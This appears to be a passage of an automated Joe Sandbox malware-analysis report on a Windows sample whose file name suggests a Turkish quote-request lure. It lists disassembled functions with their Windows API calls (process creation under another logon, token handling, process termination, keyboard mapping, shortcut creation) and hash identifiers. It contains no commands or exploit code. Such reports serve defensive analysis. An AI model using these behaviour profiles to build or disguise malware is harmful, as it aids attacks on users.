Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: caa365af2e4947f3b6149a9831b2bab4ab122fb5b74a66e6756618521a13810e
Instruction ID: b48f06559b4088cd1745bd3edb8f0334ec4793a685f4f5d94ebe1c0a18994d97
Opcode Fuzzy Hash: caa365af2e4947f3b6149a9831b2bab4ab122fb5b74a66e6756618521a13810e
Instruction Fuzzy Hash: 68E1B1315083409FC724EF24C881B6AB7E0BF95314F14896DF9999B2A2DB31EE05CF92

Function 0019920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2

BeginPaint.USER32(?,?,?), ref: 00199241
GetWindowRect.USER32(?,?), ref: 001992A5
ScreenToClient.USER32(?,?), ref: 001992C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001992D3
EndPaint.USER32(?,?,?,?,?), ref: 00199321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001D71EA

Part of subcall function 00199339: BeginPath.GDI32(00000000), ref: 00199357

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 76d4e0c16b7404b9a658ef94df82947d7e0efff9c90c8ebcc62be8e419a4aff8
Instruction ID: 883a7351b43ee327f39b3f3fb35cbf818c084e99867c75948e97be464b0e33da
Opcode Fuzzy Hash: 76d4e0c16b7404b9a658ef94df82947d7e0efff9c90c8ebcc62be8e419a4aff8
Instruction Fuzzy Hash: 2D41AC70104300AFDB21DF28DC88FAA7BB8EF56321F14062DF9A5872E1D7309855DB62

Function 001F07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 001F080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001F0847
EnterCriticalSection.KERNEL32(?), ref: 001F0863
LeaveCriticalSection.KERNEL32(?), ref: 001F08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001F08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 001F0921

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 8a9681a683984dc8f50fed458c62afa24de939e90f92fe65587e3086e25a653d
Instruction ID: 182811a1d8ed00296336328dc1d7a522adcb539ba9ae4b00cdd901294075d60b
Opcode Fuzzy Hash: 8a9681a683984dc8f50fed458c62afa24de939e90f92fe65587e3086e25a653d
Instruction Fuzzy Hash: BB418A75A00209EBDF15EF54DC85AAA77B8FF18300F1480A9ED04DA297DB70DE61DBA0

Function 002181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,001DF3AB,00000000,?,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 0021824C
EnableWindow.USER32(00000000,00000000), ref: 00218272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002182D1
ShowWindow.USER32(00000000,00000004), ref: 002182E5
EnableWindow.USER32(00000000,00000001), ref: 0021830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0021832F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d06e30f76e9cc511703e5bcfe1b850fa975efd22956538f054f89f27d9c48d4b
Instruction ID: dfdff1449df60791ea0236087cdd1fa83f433aaaffad8d720eb868df90422f89
Opcode Fuzzy Hash: d06e30f76e9cc511703e5bcfe1b850fa975efd22956538f054f89f27d9c48d4b
Instruction Fuzzy Hash: 0E41E834611681AFDB16CF14D8D9BE47BE0FB26715F1841A8E9184F2B2CB71ACA1CF40

Function 001E4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 001E4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001E4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001E4CEA
_wcslen.LIBCMT ref: 001E4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001E4D10
_wcsstr.LIBVCRUNTIME ref: 001E4D1A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 1c095f2e1e4201bbbee47d398478dbdf839ed8517b71fc689f35ab4ee300cddc
Instruction ID: 764be8ec0936618a259d6971508121cf7f213c989cab22847c3db7981d375653
Opcode Fuzzy Hash: 1c095f2e1e4201bbbee47d398478dbdf839ed8517b71fc689f35ab4ee300cddc
Instruction Fuzzy Hash: 8A21F9352046807BEB195B7AAC49EBF7B9CEFA5750F21803DF805CB191DF61DC4196A0

Function 001F581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2

_wcslen.LIBCMT ref: 001F587B
CoInitialize.OLE32(00000000), ref: 001F5995
CoCreateInstance.OLE32(0021FCF8,00000000,00000001,0021FB68,?), ref: 001F59AE
CoUninitialize.OLE32 ref: 001F59CC

Strings

.lnk, xrefs: 001F5876, 001F58C1, 001F5985

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: cd8260e16995d41d4145de71beed8c8a75b1e9d267f5068c712c5560ebc86593
Instruction ID: b29c02bd8272892b7874e5e79760a93e5f8db29f901ee176668a954ec73e91ae
Opcode Fuzzy Hash: cd8260e16995d41d4145de71beed8c8a75b1e9d267f5068c712c5560ebc86593
Instruction Fuzzy Hash: 13D164746087059FC708EF24C48492ABBE2FF99714F14885DFA8A9B361DB31ED45CB92

Function 001E175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001E0FCA
Part of subcall function 001E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001E0FD6
Part of subcall function 001E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001E0FE5
Part of subcall function 001E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001E0FEC
Part of subcall function 001E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001E1002

GetLengthSid.ADVAPI32(?,00000000,001E1335), ref: 001E17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 001E17BA
HeapAlloc.KERNEL32(00000000), ref: 001E17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 001E17DA
GetProcessHeap.KERNEL32(00000000,00000000,001E1335), ref: 001E17EE
HeapFree.KERNEL32(00000000), ref: 001E17F5

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: ad92727e035891521dee94cc605e4c1aa27574187b05610d2d5040c94b2658be
Instruction ID: 081383d00bfb0db8140b98558fcc4a0e868ae764c7a88f5c7e85cc950340918e
Opcode Fuzzy Hash: ad92727e035891521dee94cc605e4c1aa27574187b05610d2d5040c94b2658be
Instruction Fuzzy Hash: 0D11D036980A05FFDB109FA5DC49BEF7BB9EF45755F208028F48597210CB35A940CB60

Function 001E14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001E14FF
OpenProcessToken.ADVAPI32(00000000), ref: 001E1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001E1515
CloseHandle.KERNEL32(00000004), ref: 001E1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001E154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 001E1563

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f7717f3f2512c7c3a57334ba6d7f0f5352fa1a65333e02cc6e1740f5a3cbe777
Instruction ID: 4515d9509672b850677129fcb97d791bf1fe365a1f995ef2b24fecb49cc7088b
Opcode Fuzzy Hash: f7717f3f2512c7c3a57334ba6d7f0f5352fa1a65333e02cc6e1740f5a3cbe777
Instruction Fuzzy Hash: 93115676504249BBDF129FA8ED49BDE7BA9EF48704F148024FA05A21A0C7718E61DB60

Function 001A3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001A3379,001A2FE5), ref: 001A3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001A339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001A33B7
SetLastError.KERNEL32(00000000,?,001A3379,001A2FE5), ref: 001A3409

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 37a49a9b1971ed72aef28b2b0b9ef9f1f033380bff037a824966135aa16f71c8
Instruction ID: 3532c6cba62345ebf125c6608bf89c991fc24637b829d2a4a84dd06806c9ecbe
Opcode Fuzzy Hash: 37a49a9b1971ed72aef28b2b0b9ef9f1f033380bff037a824966135aa16f71c8
Instruction Fuzzy Hash: B601423F60E311BFAA692BB97C89B772A94EF2B3793300229F430882F0EF114E055144

Function 001B2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001B5686,001C3CD6,?,00000000,?,001B5B6A,?,?,?,?,?,001AE6D1,?,00248A48), ref: 001B2D78
_free.LIBCMT ref: 001B2DAB
_free.LIBCMT ref: 001B2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,001AE6D1,?,00248A48,00000010,00184F4A,?,?,00000000,001C3CD6), ref: 001B2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,001AE6D1,?,00248A48,00000010,00184F4A,?,?,00000000,001C3CD6), ref: 001B2DEC
_abort.LIBCMT ref: 001B2DF2

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 5c8186f69d3b03add0917d446ca9f02e06fb50f5f9c1c234ef79259a25bdb52c
Instruction ID: e5ac5f2181554d7dfc4eb6fd488d01ffbb9ce9816031177ed6525e080beb29e8
Opcode Fuzzy Hash: 5c8186f69d3b03add0917d446ca9f02e06fb50f5f9c1c234ef79259a25bdb52c
Instruction Fuzzy Hash: 55F0FC3954561037C61237B8BC0EEDF2559AFE77A1F354518F838D31D6EF3488095160

Function 00218A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00199639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00199693
Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996A2
Part of subcall function 00199639: BeginPath.GDI32(?), ref: 001996B9
Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00218A4E
LineTo.GDI32(?,00000003,00000000), ref: 00218A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00218A70
LineTo.GDI32(?,00000000,00000003), ref: 00218A80
EndPath.GDI32(?), ref: 00218A90
StrokePath.GDI32(?), ref: 00218AA0

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 6d11d4b772fb74fdb12cb2f92d6e0ca5e77162e517337904b51e6d08d3557847
Instruction ID: 0c299140a1c0aa416504fdba5ee69e964cabd6e04515331075ce8a1c0f34ffbb
Opcode Fuzzy Hash: 6d11d4b772fb74fdb12cb2f92d6e0ca5e77162e517337904b51e6d08d3557847
Instruction Fuzzy Hash: 5611F776040149FFDB129F94EC88EEA7FACEB18350F10C012BA199A1A1CB719D65DBA0

Function 001E51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001E5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 001E5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001E5230
ReleaseDC.USER32(00000000,00000000), ref: 001E5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 001E524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 001E5261

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f3c0adbc2e53e95a9bada5299be27f2043885196e32882bd52c006c40b8469c6
Instruction ID: 392184195682f698d81810aa6a16c05f8eadace3554f9752f90c78521ba051b7
Opcode Fuzzy Hash: f3c0adbc2e53e95a9bada5299be27f2043885196e32882bd52c006c40b8469c6
Instruction Fuzzy Hash: 8D018475A40705BBEB105BA69C49A9EBF78EB58751F148065FA08A7280DA719900CB60

Function 00181BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00181BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00181BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00181C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00181C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00181C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00181C22

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 2151c0a13a56858a28ed0cebee08e80af3442c0c960db77ad9603caa7412d156
Instruction ID: 61e2c67f53321e45fe01f4c7791b044cc48ab7f5153a7582e2b0e54d6292579e
Opcode Fuzzy Hash: 2151c0a13a56858a28ed0cebee08e80af3442c0c960db77ad9603caa7412d156
Instruction Fuzzy Hash: 390167B0942B5ABDE3008F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5

Function 001EEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001EEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001EEB46
GetWindowThreadProcessId.USER32(?,?), ref: 001EEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001EEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001EEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001EEB75

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 3fd2a7e1ad161dd2e6a7740b918773493be7f5177977d7b5c82de7d6433eb901
Instruction ID: ac352fe1ea92370a47fd2ca5115edc4762b8baa2ef45f0bfd07b76f3203397fb
Opcode Fuzzy Hash: 3fd2a7e1ad161dd2e6a7740b918773493be7f5177977d7b5c82de7d6433eb901
Instruction Fuzzy Hash: 4EF03076580558BBE7215B52EC0DEEF3A7CEFDAB11F108158F611D1091DBA05A01C6B5

Function 001D7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 001D7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 001D7469
GetWindowDC.USER32(?), ref: 001D7475
GetPixel.GDI32(00000000,?,?), ref: 001D7484
ReleaseDC.USER32(?,00000000), ref: 001D7496
GetSysColor.USER32(00000005), ref: 001D74B0

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: cf76021b49918c208a4dca1dc0840237264f72e0786874b3940215d7cba16de2
Instruction ID: c99bc274a2e8b7052cd3067a3115379718ccc0377de30615e8d6af7a881181d1
Opcode Fuzzy Hash: cf76021b49918c208a4dca1dc0840237264f72e0786874b3940215d7cba16de2
Instruction Fuzzy Hash: 48018B35440215FFDB515F64EC0CBEA7BB6FB14311F618064F915A21A0CF311E51EB10

Function 001E1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001E187F
UnloadUserProfile.USERENV(?,?), ref: 001E188B
CloseHandle.KERNEL32(?), ref: 001E1894
CloseHandle.KERNEL32(?), ref: 001E189C
GetProcessHeap.KERNEL32(00000000,?), ref: 001E18A5
HeapFree.KERNEL32(00000000), ref: 001E18AC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

